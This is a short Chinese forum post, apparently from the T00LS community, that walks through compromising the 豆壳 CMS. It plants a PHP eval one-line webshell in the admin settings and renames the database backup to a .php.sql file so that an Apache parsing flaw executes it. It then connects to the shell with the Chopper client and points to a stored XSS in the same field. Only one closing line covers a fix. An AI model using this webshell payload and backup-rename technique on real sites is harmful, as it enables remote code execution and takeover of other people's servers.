【我爱T00LS】豆壳系统的xss及后台利用解析漏洞getshell

在豆壳系统中存在解析漏洞和XSS；改系统感觉很不错，代码简单，简洁。

当我们进入后台可以直接备份出一句话木马：

1.我们先在系统设置中填写一句话木马:


2.然后在数据库备份中备份


查看源码（这里只看到input 但是编辑不了，输入框不给予编辑，所以我们利用chrome自带的代码编辑器,按下F12调出，查看源码看到input的VALUE值）

3.
直接双击那个value值修改数据库备份名字,加上后缀.php 因为apache存在解析的漏洞，可以直接把文件解析成.php


直接备份



4.然后浏览器直接访问数据库文件:data/backup/数据库名称.php.sql

解析成功

所以我们修改系统设置中加入一句话木马   <?php eval($_POST[value]);?>
菜刀链接备份文件http://url/data/backup/数据库名称.php.sql


XSS：
一样的我们直接在后台中系统设置中插入xss语句就会出现XSS漏洞

有了XSS 大家都懂的。

解决方法：
后台将输入进行转义，和程序随机生成备份。（一切输入都有害。），

小弟无才.木有技术含量..脚下留情..